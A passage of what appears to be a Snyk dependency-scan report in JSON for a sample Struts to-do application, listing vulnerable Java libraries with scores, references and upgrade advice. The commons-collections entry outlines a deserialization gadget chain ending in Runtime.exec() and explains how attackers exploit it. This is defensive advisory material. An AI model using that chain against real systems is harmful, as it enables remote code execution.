or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "TERASOLUNA Framework Development Team" + ], + "semver": { + "vulnerable": [ + "[1.3,1.3.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h", + "title": "Apache-SVN" + }, + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092", + "title": "CVE Details" + }, + { + "url": "https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml%23L84", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1349475", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:48.463842Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:14.033291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:46.791816Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:38.873057Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:48.463842Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:14.033291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.791816Z" + } + ], + "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.3.2 or higher.\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E)\n- [Apache-SVN](http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h)\n- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml#L84)\n- [GitHub Commit](https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1349475)\n", + "epssDetails": { + "percentile": "0.92395", + "probability": "0.04275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3092" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-22T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2016-12-25T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.791816Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.30", + "commons-fileupload:commons-fileupload@1.3.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "title": "Information Exposure", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,1.3.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[1.2.0 ,1.3.2)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUploadBase$FileItemIteratorImpl.java", + "className": "FileUploadBase$FileItemIteratorImpl", + "functionName": "" + } + }, + { + "version": [ + "[1.0-rc1,1.2.0)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUploadBase.java", + "className": "FileUploadBase", + "functionName": "parseRequest" + } + }, + { + "version": [ + "[,1.0-rc1)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUpload.java", + "className": "FileUpload", + "functionName": "parseRequest" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L56", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814", + "title": "GitHub Commit" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:17.073322Z" + } + ], + "description": "## Overview\r\n[`commons-fileupload:commons-fileupload`](https://commons.apache.org/proper/commons-fileupload/) provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\r\n\r\nAffected versions of the package are vulnerable to Information Disclosure because the `InputStream` is not closed on exception.\r\n\r\n## Remediation\r\nUpgrade `commons-fileupload` to version 1.3.2 or higher.\r\n\r\n## References\r\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L56)\r\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814)", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-200" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2017-10-01T08:05:48.497000Z", + "functions_new": [ + { + "version": [ + "[1.2.0 ,1.3.2)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl", + "functionName": "" + } + }, + { + "version": [ + "[1.0-rc1,1.2.0)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUploadBase", + "functionName": "parseRequest" + } + }, + { + "version": [ + "[,1.0-rc1)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUpload", + "functionName": "parseRequest" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-02-17T22:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2017-02-17T08:05:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T14:03:17.073322Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.30", + "commons-fileupload:commons-fileupload@1.3.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Jakob Ackermann" + ], + "semver": { + "vulnerable": [ + "[1.0-beta-1, 1.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy", + "title": "Apache Mailing List" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e", + "title": "GitHub Commit (Tomcat)" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:57.097583Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:59.094771Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:59.806365Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:49.130585Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:57.097583Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:59.094771Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.806365Z" + } + ], + "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.\r\n\r\n**NOTE:** After upgrading to the fixed version, the `setFileCountMax()` must be explicitly set to avoid this vulnerability.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.5 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17)\n- [GitHub Commit (Tomcat)](https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e)\n", + "epssDetails": { + "percentile": "0.91407", + "probability": "0.03359", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-24998" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2023-02-21T08:19:49.294883Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-02-21T08:00:22Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2023-02-21T09:23:34.093821Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.806365Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@6.1.2", + "commons-fileupload:commons-fileupload@1.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSIO-1277109", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", + "credit": [ + "Lukas Euler" + ], + "semver": { + "vulnerable": [ + "[0, 2.7)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-io:commons-io", + "references": [ + { + "url": "https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/IO-556", + "title": "Jira Issue" + }, + { + "url": "https://github.com/AlAIAL90/CVE-2021-29425", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:20.715148Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.8, + "modificationTime": "2024-03-11T09:51:34.519777Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.8, + "modificationTime": "2024-03-11T09:53:56.345148Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:37.151008Z" 